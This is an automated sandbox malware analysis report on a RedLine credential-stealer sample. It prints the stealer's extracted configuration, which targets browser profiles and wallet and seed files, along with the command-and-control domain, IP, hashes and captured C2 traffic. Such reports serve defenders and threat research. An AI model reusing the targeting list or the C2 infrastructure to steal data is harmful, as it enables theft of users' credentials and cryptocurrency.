
ID: 439033
Sample Name: z01OUde5Dj.exe
Cookbook: default.jbs
Time: 15:56:44
Date: 23/06/2021
Version: 32.0.0 Black Diamond

Table of Contents

Table of Contents  2
Windows Analysis Report z01OUde5Dj.exe  4
Overview  4
General Information  4
Detection  4
Signatures  4
Classification  4
Process Tree  4
Malware Configuration  4
Threatname: RedLine  4
Yara Overview  5
Initial Sample  5
Memory Dumps  5
Unpacked PEs  6
Sigma Overview  6
Signature Overview  6
AV Detection:  6
Networking:  6
System Summary:  6
Data Obfuscation:  6
Malware Analysis System Evasion:  6
Anti Debugging:  6
Stealing of Sensitive Information:  7
Remote Access Functionality:  7
Mitre Att&ck Matrix  7
Behavior Graph  7
Screenshots  8
Thumbnails  8
Antivirus, Machine Learning and Genetic Malware Detection  9
Initial Sample  9
Dropped Files  9
Unpacked PE Files  9
Domains  9
URLs  9
Domains and IPs  11
Contacted Domains  11
Contacted URLs  11
URLs from Memory and Binaries  11
Contacted IPs  11
Public  11
General Information  11
Simulations  12
Behavior and APIs  12
Joe Sandbox View / Context  12
IPs  12
Domains  12
ASN  13
JA3 Fingerprints  13
Dropped Files  13
Created / dropped Files  13
Static File Info  13
General  13
File Icon  14
Static PE Info  14
General  14
Authenticode Signature  14
Entrypoint Preview  14
Data Directories  14
Sections  14
Resources  15
Imports  15
Version Infos  15
Possible Origin  15
Network Behavior  15
Network Port Distribution  15
TCP Packets  15
UDP Packets  15
DNS Queries  15
DNS Answers  15
HTTP Request Dependency Graph  16
HTTP Packets  16
Code Manipulations  18
Statistics  18
System Behavior  18
Copyright Joe Security LLC 2021 Page 2 of 19
Analysis Process: z01OUde5Dj.exe PID: 2792 Parent PID: 5644  18
General  18
File Activities  18
File Created  18
File Read  18
Registry Activities  18
Disassembly  18
Code Analysis  18

Windows Analysis Report z01OUde5Dj.exe

Overview

General Information

Sample Name: z01OUde5Dj.exe
Analysis ID: 439033
MD5: b66ba241fe7edb6…
SHA1: 99dccd2255ca91…
SHA256: e6313d65c6dfa85…
Tags: exe RedLineStealer
Infos:
Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE se…
Found malware configuration
Multi AV Scanner detection for doma…
Multi AV Scanner detection for subm…
Yara detected RedLine Stealer
.NET source code contains a method …
Found many strings related to Crypt…
Hides threads from debuggers
Machine Learning detection for samp…
PE file contains section with special…
Performs DNS queries to domains wi…
Queries sensitive video device inform…
Query firmware table information (lik…
Tries to detect sandboxes / dynam…
Tries to detect sandboxes and other…
AV process strings found (often use…
Antivirus or Machine Learning detec…
Binary contains a suspicious time st…
Checks if the current process is bein…
Contains capabilities to detect virtua…
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sec…
Found a high number of Window / Us…
HTTP GET or POST without a user …
Internet Provider seen in connection …
May sleep (evasive loops) to hinder …
Monitors certain registry keys / valu…
PE / OLE file has an invalid certificate
PE file contains sections with non-sta…
PE file contains strange resources
Queries the volume information (nam…
Sample file is different than original …
Uses 32bit PE files
Uses code obfuscation techniques (…
Yara detected Credential Stealer

Classification

RedLine
Verdict scale: malicious / suspicious / clean
Classification wheel categories: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware

Process Tree

System is w10x64
z01OUde5Dj.exe (PID: 2792 cmdline: 'C:\Users\user\Desktop\z01OUde5Dj.exe' MD5: B66BA241FE7EDB6C16DDD9341F1E84D4)
cleanup

Malware Configuration

Threatname: RedLine

{
  "BlockedCountry": [],
  "BlockedIP": [],
  "ScanBrowsers": "true",
  "ScanChromeBrowsersPaths": [
    "%USERPROFILE%\\AppData\\Local\\\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data",
    "%USERPROFILE%\\AppData\\Roaming\\ Software\\",
    "%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Iridium\\User Data",
    "%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data",
    "%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Chedot\\User Data",
    "%USERPROFILE%\\AppData\\Local\\\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Kometa\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\ Privacy Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer",
    "%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data",
    "%USERPROFILE%\\AppData\\Local\\liebao\\User Data",
    "%USERPROFILE%\\AppData\\Local\\QIP \\User Data",
    "%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data",
    "%USERPROFILE%\\AppData\\Local\\\\User Data",
    "%USERPROFILE%\\AppData\\Local\\\\YandexBrowser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Comodo\\User Data",
    "%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data",
    "%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data",
    "%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Uran\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data",
    "%USERPROFILE%\\AppData\\Local\\BraveSoftware\\-Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data",
    "%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience",
    "%USERPROFILE%\\AppData\\Local\\Steam",
    "%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data"
  ],
  "ScanDiscord": "true",
  "ScanFTP": "false",
  "ScanFiles": "false",
  "ScanFilesPaths": [
    "%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0",
    "%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0"
  ],
  "ScanGeckoBrowsersPaths": [
    "%USERPROFILE%\\AppData\\Roaming\\Mozilla\\",
    "%USERPROFILE%\\AppData\\Roaming\\",
    "%USERPROFILE%\\AppData\\Roaming\\K-Meleon",
    "%USERPROFILE%\\AppData\\Roaming\\Thunderbird",
    "%USERPROFILE%\\AppData\\Roaming\\Comodo\\IceDragon",
    "%USERPROFILE%\\AppData\\Roaming\\8pecxstudios\\Cyberfox",
    "%USERPROFILE%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw",
    "%USERPROFILE%\\AppData\\Roaming\\Moonchild Productions\\"
  ],
  "ScanScreen": "false",
  "ScanSteam": "false",
  "ScanTelegram": "false",
  "ScanVPN": "false",
  "ScanWallets": "true"
}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
z01OUde5Dj.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: z01OUde5Dj.exe PID: 2792 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
Process Memory Space: z01OUde5Dj.exe PID: 2792 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.z01OUde5Dj.exe.2b0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
1.0.z01OUde5Dj.exe.2b0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Networking:

Performs DNS queries to domains with low reputation

System Summary:

PE file contains section with special chars

Data Obfuscation:

Detected unpacking (changes PE section rights)

.NET source code contains method to dynamically call methods (often used by packers)

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Anti Debugging:

Hides threads from debuggers

Tries to detect sandboxes and other dynamic analysis tools (window names)

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Remote Access Functionality:

Yara detected RedLine Stealer

Mitre Att&ck Matrix

Tactic columns: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects.

Techniques with matched signature counts (all other cells of the matrix are unmatched placeholders):

Privilege Escalation: Process Injection 1
Defense Evasion: Disable or Modify Tools 1; Virtualization/Sandbox Evasion 4 4 1; Process Injection 1; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Software Packing 2 3; Timestomp 1
Credential Access: OS Credential Dumping 1
Discovery: Query Registry 1; Security Software Discovery 5 3; Process Discovery 1; Virtualization/Sandbox Evasion 4 4 1; Application Window Discovery 1; Remote System Discovery 1; System Information Discovery 1 3
Collection: Archive Collected Data 1
Command and Control: Encrypted Channel 1; Non-Application Layer Protocol 2; Application Layer Protocol 2

Behavior Graph

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

ID: 439033
Sample: z01OUde5Dj.exe
Startdate: 23/06/2021
Architecture: WINDOWS
Score: 100

Graph nodes (rendered graph not reproduced):

z01OUde5Dj.exe (started, is malicious)
  Signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Found malware configuration; 7 other signatures
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Detected unpacking (changes PE section rights); 4 other signatures
DNS: zedaumalev.xyz; prda.aadg.msidentity.com; api.ip.sb
IP: 77.246.145.4 (zedaumalev.xyz), ports 49726, 49733 -> 80, THEFIRST-ASRU, Russian Federation

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
z01OUde5Dj.exe | 43% | Virustotal |
z01OUde5Dj.exe | 39% | ReversingLabs | Win32.Trojan.Generic
z01OUde5Dj.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
1.0.z01OUde5Dj.exe.2b0000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
zedaumalev.xyz | 8% | Virustotal |

URLs

Source | Detection | Scanner | Label
service.r | 0% | URL Reputation | safe
schemas.m | 0% | URL Reputation | safe
ocsp.sectigo.com0 | 0% | URL Reputation | safe
tempuri.org/Endpoint/GetArguments | 0% | Avira URL Cloud | safe
://api.ip.sb/geoip | 0% | URL Reputation | safe
https://api.ip.sb/geoip | 0% | URL Reputation | safe
https://d41.co | 0% | Avira URL Cloud | safe
https://postlnk.com/afu.php?zoneid=2579647&var=2579647&rid=wfxzsvAkbQDjdtH2xjZy_Q%3D%3D | 0% | Avira URL Cloud | safe
tempuri.org/ | 0% | Avira URL Cloud | safe
https://googleads.g.doub | 0% | Avira URL Cloud | safe
tempuri.org/L | 0% | Avira URL Cloud | safe
tempuri.org/Endpoint/VerifyUpdateResponse | 0% | Avira URL Cloud | safe
www.remote88.com:808/feii/ | 0% | Avira URL Cloud | safe
go.micros | 0% | URL Reputation | safe
tempuri.org/Endpoint/GetUpdates | 0% | Avira URL Cloud | safe
tempuri.org/Endpoint/VerifyScanRequest | 0% | Avira URL Cloud | safe
www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe
zedaumalev.xyz/ | 100% | Avira URL Cloud | malware
support.a | 0% | URL Reputation | safe
zedaumalev.xyz4 | 0% | Avira URL Cloud | safe
https://bludwan.com/afu.php?zoneid=2974233&var=2974233&rid=wfxzsvAkbQDjdtH2xjZy_Q%253D%253D | 0% | Avira URL Cloud | safe
https://watchseriesmovie.online/movie/570670/the-invisible-man%22 | 0% | Avira URL Cloud | safe
schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
zedaumalev.xyz | 100% | Avira URL Cloud | malware
https://api.ip.sb4 | 0% | URL Reputation | safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
https://helpx.ad | 0% | URL Reputation | safe
https://dmz01.app.clic | 0% | Avira URL Cloud | safe
tempuri.org/0D | 0% | Avira URL Cloud | safe
zedaumalev.xyz:80/ | 100% | Avira URL Cloud | malware
https://get.adob | 0% | URL Reputation | safe
tempuri.org/Endpoint/GetArgumentsResponse | 0% | Avira URL Cloud | safe
crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
10.223.5.145:8080 | 0% | Avira URL Cloud | safe
crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
https://icanhazip.com4https://wtfismyip.com/textBbot.whatismyipaddress.com/2http://checkip.dy | 0% | Avira URL Cloud | safe
forms.rea | 0% | URL Reputation | safe
tempuri.org/Endpoint/GetUpdatesResponse | 0% | Avira URL Cloud | safe
https://thebestvpndeals.com/best-vpn/ | 0% | Avira URL Cloud | safe
tempuri.org/Endpoint/VerifyScanRequestResponse | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
zedaumalev.xyz | 77.246.145.4 | true | true | 8%, Virustotal | unknown
api.globalsign.cloud | 104.18.24.243 | true | false | | unknown
api.ip.sb | unknown | unknown | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
zedaumalev.xyz/ | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
77.246.145.4 | zedaumalev.xyz | Russian Federation | 29182 | THEFIRST-ASRU | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 439033
Start date: 23.06.2021
Start time: 15:56:44
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 38s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: z01OUde5Dj.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@4/1
EGA Information: Failed
HDC Information: Failed
HCA Information: Failed
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .exe
Warnings:

Simulations

Behavior and APIs

Time | Type | Description
15:58:04 | API Interceptor | 21x Sleep call for process: z01OUde5Dj.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
77.246.145.4 | file5.exe | malicious | zedaumalev.xyz/
77.246.145.4 | mABjln5TWY.exe | malicious | xiplisineld.xyz/
77.246.145.4 | DjILCIP9hY.exe | malicious | xiplisineld.xyz/

Domains

Match | Associated Sample Name / URL | Detection | Context
zedaumalev.xyz | file5.exe | malicious | 77.246.145.4
api.globalsign.cloud | Wire Info.docx | malicious | 104.18.25.243
api.globalsign.cloud | UtCpzrmwGu.exe | malicious | 104.18.24.243
api.globalsign.cloud | RvWeTt8ldZ.exe | malicious | 104.18.24.243
api.globalsign.cloud | certificate-06.21.2021.doc | malicious | 104.18.25.243
api.globalsign.cloud | 2cAwMgDOoJ.dll | malicious | 104.18.25.243
api.globalsign.cloud | tVbylB68KX.exe | malicious | 104.18.25.243
api.globalsign.cloud | 2niwu9RX7S.exe | malicious | 104.18.24.243
api.globalsign.cloud | W1LADtfe9W.exe | malicious | 104.18.25.243
api.globalsign.cloud | A393FB9AD8A42849AAD09CBB83C6D4E9B32A406276B8F.exe | malicious | 104.18.24.243
api.globalsign.cloud | B9BD8B8A68C178B40CBE38AF42B5023B0BA6B72BBDADF.exe | malicious | 104.18.25.243
api.globalsign.cloud | Z5ZqTSn7Ug.exe | malicious | 104.18.25.243
api.globalsign.cloud | bRvjhaDw5v.exe | malicious | 104.18.25.243
api.globalsign.cloud | 1lJOC0jbic.exe | malicious | 104.18.24.243
api.globalsign.cloud | Death_In_Vegas_-_Dead_Elvis_814616-1.exe | malicious | 104.18.24.243
api.globalsign.cloud | taQ3CBmblo.exe | malicious | 104.18.24.243
api.globalsign.cloud | 7100173026-ORG.doc | malicious | 104.18.24.243
api.globalsign.cloud | contract_proforma_invoice.exe | malicious | 104.18.24.243
api.globalsign.cloud | app.dll | malicious | 104.18.24.243
api.globalsign.cloud | Yeni sipari_ WJO-001, pdf.exe | malicious | 104.18.24.243
api.globalsign.cloud | FBt9o6x4r5.exe | malicious | 104.18.25.243

ASN

Match | Associated Sample Name / URL | Detection | Context
THEFIRST-ASRU | ebsL2ZF4ww.exe | malicious | 62.109.8.10
THEFIRST-ASRU | CPPDolphinInfected.exe | malicious | 82.146.44.166
THEFIRST-ASRU | PDHIfAIr0l.exe | malicious | 82.146.63.219
THEFIRST-ASRU | dhz7CHgHBx.exe | malicious | 185.43.4.137
THEFIRST-ASRU | JB3aOL8aju.exe | malicious | 212.109.196.168
THEFIRST-ASRU | boI88C399w.exe | malicious | 78.24.219.147
THEFIRST-ASRU | boI88C399w.exe | malicious | 78.24.219.147
THEFIRST-ASRU | H52KKfQd1I.exe | malicious | 82.146.57.148
THEFIRST-ASRU | Bx3NdrImpt.exe | malicious | 212.109.199.108
THEFIRST-ASRU | dn5EcG4gHy.exe | malicious | 185.43.6.178
THEFIRST-ASRU | patcher.exe | malicious | 188.120.236.34
THEFIRST-ASRU | sE3PiwL1fx.exe | malicious | 188.120.236.34
THEFIRST-ASRU | A393FB9AD8A42849AAD09CBB83C6D4E9B32A406276B8F.exe | malicious | 82.146.61.137
THEFIRST-ASRU | 5sF4QVZ67t.exe | malicious | 62.109.24.104
THEFIRST-ASRU | B9BD8B8A68C178B40CBE38AF42B5023B0BA6B72BBDADF.exe | malicious | 79.174.13.146
THEFIRST-ASRU | 5AD94A2FFA3E6B23061E726CE0C09648811C4294F048D.exe | malicious | 92.63.99.159
THEFIRST-ASRU | 9eex2KNXBT.exe | malicious | 149.154.71.163
THEFIRST-ASRU | w8S6R0Jtjj.exe | malicious | 62.109.24.104
THEFIRST-ASRU | dqVPlpmWYt.exe | malicious | 37.230.116.121
THEFIRST-ASRU | P4SRvI1baM.exe | malicious | 82.202.161.188

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.863618874642304
TrID:
  Win32 Executable (generic) Net Framework (10011505/4) 50.01%
  Win32 Executable (generic) a (10002005/4) 49.97%
  Generic Win/DOS Executable (2004/3) 0.01%
  DOS Executable Generic (2002/1) 0.01%
  Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: z01OUde5Dj.exe
File size: 2958360
MD5: b66ba241fe7edb6c16ddd9341f1e84d4
SHA1: 99dccd2255ca919d8042e8d33d03d70b02dec67d
SHA256: e6313d65c6dfa85c2aa1f5cfefc0b71ec47d6b9f6f4ef5351fd86b9f6fbbd935
SHA512: 3ab3c6acfb1a2b793ff99fbe5a53f904e65f97837af8950de884251a2df34151ba836e9346db6202b2e936c2e3063176dfc3b7b1eadfeb1fde33a75a5772db4f
SSDEEP: 49152:2oyvuUr24Qavxv5xOpDYFtBq0z0sRAHjZZJscVK8Fzc/yfyjS:2VvDJqhDsuHjZTscVK8FyS
File Content Preview: MZ...... @...... !..L.!This program cannot be run in DOS mode....$...... PE..L...... x...... X...... @...... q...... @......

File Icon

Icon Hash: 235dd4d4d4d469ab

Static PE Info

General

Entrypoint: 0x988680
Entrypoint Section: .boot
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp: 0xC4BF1DD9 [Tue Aug 7 09:22:33 2074 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 4328f7206db519cd4e82283211d98e83

Authenticode Signature

Signature Valid: false
Signature Issuer: CN=Xiaomi Haylou GT1 XR
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After: 6/21/2021 5:20:22 AM, 6/22/2031 5:20:22 AM
Subject Chain: CN=Xiaomi Haylou GT1 XR
Version: 3
Thumbprint MD5: 61C379BD64BB0C74B4C2976C1E9EF931
Thumbprint SHA-1: AC3E67FC17E674883A4D450FA93FFB4EEED173F4
Thumbprint SHA-256: 8DEFADAEEDD094CD43596A0C67827874ACB416A73C48920328DBFE52E968DF15
Serial: 193A579190FBB3BF4A1ACEB10B1FF102

Entrypoint Preview

Data Directories

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2e000 | 0x2da00 | False | 0.502745077055 | data | 6.23484848007 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.sdata | 0x30000 | 0xeba | 0x1000 | False | 0.4453125 | data | 4.15274478588 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
(no name) | 0x32000 | 0x196550 | 0xd9000 | False | 0.9999437464 | data | 7.99979318933 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1ca000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata | 0x1cc000 | 0x2000 | 0x200 | False | 0.16796875 | data | 1.14864242974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
(l)ZCs S | 0x1ce000 | 0x33800 | 0x33800 | False | 0.999834079187 | data | 7.99901505721 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.themida | 0x202000 | 0x384000 | 0x0 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.boot | 0x586000 | 0x160e00 | 0x160e00 | False | 0.988194767313 | data | 7.95081773029 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
(l)ZCs S | 0x6e8000 | 0x8d0 | 0xa00 | False | 0.865234375 | data | 7.29120131367 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x6ea000 | 0x3378f | 0x33800 | False | 0.130740860133 | data | 4.27264624831 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Imports

Version Infos

Possible Origin

Language of compilation system Country where language is spoken Map

Konkani India

English United States

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 23, 2021 15:57:58.243825912 CEST | 192.168.2.3 | 8.8.8.8 | 0xc9e1 | Standard query (0) | zedaumalev.xyz | A (IP address) | IN (0x0001)
Jun 23, 2021 15:58:00.808989048 CEST | 192.168.2.3 | 8.8.8.8 | 0x3a4d | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jun 23, 2021 15:58:00.878340960 CEST | 192.168.2.3 | 8.8.8.8 | 0x4828 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jun 23, 2021 15:59:45.034365892 CEST | 192.168.2.3 | 8.8.8.8 | 0x8405 | Standard query (0) | zedaumalev.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName / Address | Type | Class
Jun 23, 2021 15:57:30.092854977 CEST | 8.8.8.8 | 192.168.2.3 | 0x1c03 | No error (0) | api.globalsign.cloud | 104.18.24.243 | A (IP address) | IN (0x0001)
Jun 23, 2021 15:57:30.092854977 CEST | 8.8.8.8 | 192.168.2.3 | 0x1c03 | No error (0) | api.globalsign.cloud | 104.18.25.243 | A (IP address) | IN (0x0001)
Jun 23, 2021 15:57:58.303046942 CEST | 8.8.8.8 | 192.168.2.3 | 0xc9e1 | No error (0) | zedaumalev.xyz | 77.246.145.4 | A (IP address) | IN (0x0001)
Jun 23, 2021 15:58:00.867274046 CEST | 8.8.8.8 | 192.168.2.3 | 0x3a4d | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | CNAME (Canonical name) | IN (0x0001)
Jun 23, 2021 15:58:00.937092066 CEST | 8.8.8.8 | 192.168.2.3 | 0x4828 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | CNAME (Canonical name) | IN (0x0001)
Jun 23, 2021 15:59:45.104382038 CEST | 8.8.8.8 | 192.168.2.3 | 0x8405 | No error (0) | zedaumalev.xyz | 77.246.145.4 | A (IP address) | IN (0x0001)
Jun 23, 2021 15:59:45.645648956 CEST | 8.8.8.8 | 192.168.2.3 | 0x5928 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | CNAME (Canonical name) | IN (0x0001)

HTTP Request Dependency Graph

zedaumalev.xyz

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49726 | 77.246.145.4 | 80 | C:\Users\user\Desktop\z01OUde5Dj.exe

Jun 23, 2021 15:57:58.709378004 CEST, 1301 kBytes transferred, OUT:
POST / HTTP/1.1
Content-Type: text/; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: zedaumalev.xyz
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Jun 23, 2021 15:57:58.788089991 CEST, 1301 kBytes transferred, IN:
HTTP/1.1 100 Continue

Jun 23, 2021 15:57:59.013820887 CEST, 1302 kBytes transferred, IN:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Jun 2021 13:57:58 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw / Data Ascii: gzip-compressed chunked response body (hex and ASCII dump not reproduced)
83 81 24 2b ab 68 74 63 b6 da 07 c3 02 64 8e 92 46 16 f6 7f 10 11 c2 a6 78 5c a0 06 ed 63 53 1d e0 e6 b6 59 7a 61 ef cd 84 6c 74 84 e2 c6 a6 a2 5d 4f 0c 7f b3 99 66 3f 49 b5 60 eb c3 b3 3a d2 3d a3 b6 3b 7a 1f a9 f9 5d 20 b4 96 45 30 af 6f 76 99 32 21 8c 37 66 69 d0 d5 68 b3 9a 7b 92 3c c1 81 93 e4 5f d7 17 c8 bc 92 16 06 5e b8 b2 99 b0 fb c7 f1 60 dc 75 fa 28 13 94 39 9d 2c 45 23 18 9a b5 0f 8e b7 31 b4 8a 81 61 f1 e7 a7 a6 06 12 9f 3f 77 72 9b 68 9c 93 c5 3f ef aa ee df 92 e9 92 67 0f 98 a2 28 c3 23 2e 5e ca 8a 26 c3 f9 f4 85 e6 97 82 52 c7 cc 4e f9 46 9b 8b 5e eb ff 13 f6 9e 9a a1 24 12 97 a6 83 ab 60 00 6a ad 31 f9 56 6f e8 8d 7e 5f 6f 84 48 eb ef eb 6b d8 9a ff 8c 70 0e da bc 28 80 b0 fe ad f9 fd 58 1f c3 21 dd 9f f3 ce 06 74 df 0e bb 0c c4 08 e8 1a ff ff e3 4c 49 fb 27 f8 cc 38 27 c1 90 49 58 e2 a6 c2 c1 e1 2b d1 20 ab 99 e6 f5 1b 50 54 30 9d 47 a9 d9 14 0d 5d 90 61 05 eb 62 27 1c 53 d8 13 85 0a 10 1f 13 a0 1b 95 9f 77 0c 23 